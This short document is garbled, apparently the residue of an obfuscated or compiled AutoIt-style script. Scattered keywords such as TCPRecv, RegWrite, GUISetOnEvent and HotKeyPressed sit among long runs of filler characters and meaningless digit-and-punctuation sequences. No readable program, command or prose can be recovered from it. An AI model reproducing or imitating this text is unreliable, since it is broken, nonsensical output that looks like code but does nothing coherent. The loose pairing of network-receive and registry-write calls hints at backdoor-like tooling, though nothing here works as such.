eXit$@HotKeYPressede
eXit$XκκκκκκκκκκκκκκκκAκκκκκκκκκκκκκκκκκκ]κκκκκκκκκκκκ8:0?8:7?8:1?8:0?W+8:''E$4
$Enn$b+''d
$ 
While„$n2
Weile n$1$2$R$b+''W:?dE1n8:=?8:1?8:0?8:7?x:7?w1?8:1?8:7?''d
h0?8:7?8:0?8:1?8:1?8:7?8:1?1:8?8:7?8:$4
$Enn$b+'':1?8:7?7:0?8:0?8:1?8:1?8:7?8::1?1:8?8:7?8:κκκκκκκκκκTCPRecvκκκκκκκκκκκκκκκ8:0?8:7?8:1?8:0?W+8:''End$4
$Enn$b+''WEile„$nlifw2nashe$4$ΞχWhile$nEnfFunc“wH$1$2$R$b+''d
$ 
While„$n2
Wile n$1$2R$b+κκκκκκκ’κκκκκκκκκκκ1?8:0?8:0?8:1?8:1?888?:7?GUISetOnEvent8:κκκκκκκκκκκκκκκ''WEnnfl0?8:7?8:1?8:0?8:1?8:0?8:0?8:1?8:1?8:3ElseIf:3?8:0?8:$R$b+''?8:0?8::8?8:7?8:$4
$Enn$8:1?0:0?8:1?:1?1:88?:7?8:κκκκκκκκκκκκκκκ''WEndαααααααααααααRegWritαααααααααααααIsKeywordααααααααααααααααIsKvywordαααααααααααααα:3?8?:?:1838:1?8A:1?8:7?8/:0?8:$R$b'+'d
$ 
While„$n2
When n$1$2$R$b+''WEnd:1?8:0?8:1?8:0?8:7?x:7?7:0?8:0?8:8?8:7?8:$4
$Enn?8:7?8:κκκκκκκκκκTCPRecvκκκκκκκκκκκκκκκ8:0?8:7?8:1?8:0?W+8:''ααααα:3?8?:?:1838:1?8A:1?8:7?8/:0?8:$R$b+''d
$ 
While„$n2
When n$1$2$R$b+''WEnd:?781?x:7?7:0?8:0?8:8?8:7?8:$4
$Enn?8:7?8:κκκκκκκκκκTCPRecvκκκκκκκκκκκκκκκ8:0?8:7?8:1?8:0?W+8:'':7?8:$4
$Enn$b+''W807:??8:7?8:1?0:0?8:1?:1?1:88?:7?8:κκκκκκκκκκκκκκκ''WEndααααααααααααααα:1=8:7?8:1?1:8?8:7?8:$4
$Enn$b+''W0?8:7?